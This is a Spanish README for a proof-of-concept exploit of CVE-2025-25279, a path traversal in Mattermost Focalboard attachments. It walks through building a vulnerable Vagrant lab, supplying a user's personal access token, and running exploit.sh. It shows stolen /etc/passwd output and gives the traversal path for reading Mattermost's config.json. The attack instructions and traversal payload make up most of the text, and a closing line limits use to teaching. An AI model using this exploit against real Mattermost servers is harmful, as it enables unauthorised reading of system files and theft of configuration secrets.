
Prueba de concepto del exploit para CVE-2025-25279, un path traversal en Mattermost Focalboard que permite la lectura arbitraria de archivos autenticada y la exfiltración de archivos sensibles.
Esta prueba de concepto demuestra la explotación de la vulnerabilidad CVE-2025-25279 que afecta a Mattermost 10.4.1.
Una falla en Focalboard (el módulo de gestión de tableros) permite una lectura arbitraria de archivos mediante un path traversal en los attachments.
El exploit permite exfiltrar:
/etc/passwd/etc/groupopt/mattermost/config/config.jsonEl ataque funciona únicamente con una cuenta de usuario autenticado en los escenarios vulnerables.
La carpeta target/ no está incluida (demasiado grande para GitHub).
Descargar manualmente: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz
Primero ve al directorio target y ejecuta:
cd target
make mattermost.box
Asegúrate de tener la box mattermost-poc, de lo contrario la VM no funcionará:
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box
cd live/vm1
vagrant up
Conectarse a la VM
vagrant ssh
abrir: http://localhost:8065
Perfil --> Security --> Personal Access Tokens
Desde la máquina anfitriona:
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip
chmod +x exploit.sh
./exploit.sh
Se te pedirá:
PAT (Personal Access Token) :
👉 Ingresa un PAT válido de un usuario de Mattermost.
📸 Ejemplo de salida (exfiltración de /etc/passwd)
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh
Archivo objetivo: config.json
Para apuntar a un archivo sensible de Mattermost:
Modificar al inicio del script exploit.sh:
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
El exploit mostrará entonces el contenido del archivo config.json.
🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril
🎬 Demostración en video
👉 Una demostración completa en video se encuentra en: live/Démonstration/video-poc-cve-2025-25279.mp4
🧩 Notas
Este PoC está estrictamente destinado a entornos de aprendizaje. No utilizar nunca fuera del ámbito pedagógico o sin autorización.